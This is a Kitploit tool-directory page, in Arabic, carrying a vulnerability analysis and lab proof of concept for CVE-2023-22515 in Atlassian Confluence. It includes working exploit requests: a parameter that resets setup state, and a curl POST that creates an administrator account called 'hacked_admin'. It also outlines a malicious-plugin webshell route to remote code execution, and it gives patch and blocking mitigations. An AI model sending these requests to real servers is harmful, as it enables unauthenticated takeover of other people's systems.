Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-22515 — تحليل مفصل واستغلال إثبات المفهوم لـ CVE-2023-22515، وهي ثغرة حرجة في التحكم في الوصول المكسور في Atlassian Confluence Data Center وServer، مما يتيح إنشاء حساب مسؤول غير مصادق عليه وتنفيذ تعليمات برمجية عن بعد محتمل. | Kitploit
أدوات/GitHubGitHub/dkq-k/cve-2023-22515
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubdkq-k/cve-2023-22515

CVE-2023-22515

تحليل مفصل واستغلال إثبات المفهوم لـ CVE-2023-22515، وهي ثغرة حرجة في التحكم في الوصول المكسور في Atlassian Confluence Data Center وServer، مما يتيح إنشاء حساب مسؤول غير مصادق عليه وتنفيذ تعليمات برمجية عن بعد محتمل.

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-22515: تقرير تحليل ثغرة تصعيد الامتيازات في Confluence Data Center & Server

1. نظرة عامة (Overview)

CVE-2023-22515 هي ثغرة التحكم في الوصول المكسور (Broken Access Control) خطيرة تم اكتشافها في منتجات Atlassian Confluence Data Center وServer. يمكن للمهاجم عن بعد دون مصادقة إعادة تنشيط عملية الإعداد الأولي للخادم، ومن خلال ذلك إنشاء حساب مدير جديد والاستيلاء الكامل على النظام.

  • CVE ID: CVE-2023-22515
  • درجة CVSS: 10.0 (حرجة)
  • الإصدارات المتأثرة: 8.0.0 ~ 8.5.1 (باستثناء بعض الإصدارات)

2. تحليل الثغرة بالتفصيل (Vulnerability Analysis)

السبب الجذري (Root Cause)

جوهر هذه الثغرة هو عدم كفاية التحقق بين آلية ربط المعلمات في إطار XWork2 ومنطق معالجة الإجراءات (Action) في Confluence.

يمكن للمهاجم التلاعب بقيمة bootstrapStatusProvider.applicationConfig.setupComplete إلى false عبر معلمات URL. هذه الخاصية هي علامة مهمة تحدد ما إذا كان Confluence قد أكمل التثبيت والإعداد.

root@kitploit:~
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: <target-ip>

عند إرسال هذا الطلب، يعتقد الخادم في الذاكرة أن الإعداد لم يكتمل. هذا لا يغير ملف الإعداد الدائم (confluence.cfg.xml)، لكنه يغير الحالة أثناء التشغيل مما يسمح بتجاوز التحكم في الوصول.

آلية الهجوم (Attack Mechanism)

  1. إعادة تعيين حالة الإعداد: يصل المهاجم إلى نقطة نهاية عامة مثل /server-info.action ويرسل المعامل bootstrapStatusProvider.applicationConfig.setupComplete=false.
  2. تجاوز التحكم في الوصول: يعتبر الخادم نفسه الآن في حالة "قيد التثبيت"، وبالتالي يتم رفع القيود عن الوصول إلى صفحات إعداد المدير تحت مسار /setup/*.
  3. إنشاء حساب مدير: يصل المهاجم إلى صفحة /setup/setupadministrator.action وينشئ حساب مدير نظام جديد.
  4. الاستيلاء على النظام: يسجل الدخول بحساب المدير المنشأ ويحصل على جميع صلاحيات النظام. يمكنه بعد ذلك تنفيذ أنشطة ضارة إضافية مثل رفع شيل ويب، تسريب بيانات، نشر برمجيات فدية.

3. إعادة إنتاج الثغرة (Reproduction)

إعداد البيئة (Environment Setup)

تم إعداد Confluence Server بإصدار ضعيف (8.5.1) باستخدام Docker.

  • صورة Docker: atlassian/confluence-server:8.5.1
  • قاعدة البيانات: PostgreSQL 14

docker-compose.yml (ملخص):

root@kitploit:~
services:
  confluence:
    image: atlassian/confluence-server:8.5.1
    ports:
      - "8090:8090"
    environment:
      - ATL_DB_TYPE=postgresql
      # ... إعدادات قاعدة البيانات ...

تنفيذ الاستغلال (Exploitation)

لتجنب مشاكل اعتماديات Python، تم كتابة وتنفيذ PoC باستخدام سكريبت Bash مع curl.

سير الاستغلال:

  1. إعادة تعيين حالة الإعداد:

    root@kitploit:~
    curl -v "http://localhost:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
    

    النتيجة: تم استجابة HTTP 302 إعادة توجيه، وتأكدنا من إلغاء حالة الإعداد المكتمل داخليًا.

  2. إنشاء مدير:

    root@kitploit:~
    curl -X POST "http://localhost:8090/setup/setupadministrator.action" \
      -H "X-Atlassian-Token: no-check" \
      --data "username=hacked_admin&password=p@ssw0rd123&..."
    

    النتيجة: تمت محاولة إنشاء حساب hacked_admin من خلال هذا الطلب، وأصبح الوصول بهذا الحساب ممكنًا من صفحة تسجيل الدخول.

4. الإجراءات العلاجية (Mitigation)

تطبيق التصحيح (Patch)

يجب الترقية فورًا إلى أحدث الإصدارات التي توفرها Atlassian.

  • الإصدارات المعدلة: 8.3.3 و8.4.3 و8.5.2 وما فوق

إجراءات تخفيف مؤقتة (Workaround)

في حالة عدم إمكانية تطبيق التصحيح، يجب حظر الوصول إلى نقطة النهاية /setup/* على مستوى الشبكة (موازن التحميل، WAF، وكيل عكسي، إلخ).

  • عنوان URL المراد حظره: /setup/*

6. هجوم متقدم: سيناريو تنفيذ الأوامر عن بعد (RCE)

نظرة عامة

المهاجم الذي حصل على صلاحيات المدير عبر CVE-2023-22515 يمكنه التقدم إلى مرحلة تنفيذ أوامر النظام (RCE).

يوفر Confluence للمدير صلاحية تثبيت الإضافات (Add-ons). يمكن للمهاجم استغلال ذلك لرفع إضافة خبيثة تحتوي على وظيفة شيل ويب (Web Shell) وبالتالي الحصول على التحكم في نظام تشغيل الخادم.

سلسلة الهجوم (Attack Chain)

  1. إنشاء حساب مدير (CVE-2023-22515): الحصول على صلاحيات مدير النظام بالطريقة الموضحة سابقًا.
  2. خدعة إكمال الإعداد: إذا كان الخادم عالقًا في 'وضع الإعداد'، يمكن إكمال الإعداد قسريًا عبر /setup/finishsetup.action (مع تجاوز الترخيص) أو استكشاف قوائم المدير المتاحة باستخدام جلسة موجودة.
  3. رفع إضافة خبيثة:
    • القائمة: Confluence Administration -> Manage Apps -> Upload App
    • الملف: ملف .jar يحتوي على فئات Java خبيثة.
  4. تنفيذ الأوامر:
    • الوصول إلى عنوان URL الذي توفره الإضافة المرفوعة (مثل /plugins/servlet/webshell?cmd=id) لتنفيذ أوامر النظام.

حدود بيئة إعادة الإنتاج الحالية

بيئة الممارسة هذه (Docker) لا تملك ترخيص Confluence صالحًا، لذا لا يمكن إكمال مرحلة الإعداد الأولي. وبالتالي، كان طلب إنشاء حساب المدير ناجحًا (إعادة توجيه 302)، لكن الوصول إلى قائمة الإضافات وتنفيذ RCE الفعلي كان محدودًا. في البيئات الإنتاجية الحقيقية، الترخيص مسجل، لذا يمكن تنفيذ RCE فورًا دون هذه القيود.

7. الخلاصة (Conclusion)

CVE-2023-22515 هي ثغرة خطيرة جدًا تسمح بالحصول على صلاحيات المدير دون مصادقة. يمكن تنفيذ الهجوم بمجرد التلاعب بمعلمات URL، مما يجعل صعوبة الهجوم منخفضة جدًا. لذلك، يجب على المؤسسات التي تستخدم هذه الإصدارات تطبيق التصحيح أو الإجراءات التخفيفية فورًا.

تنزيل الأداة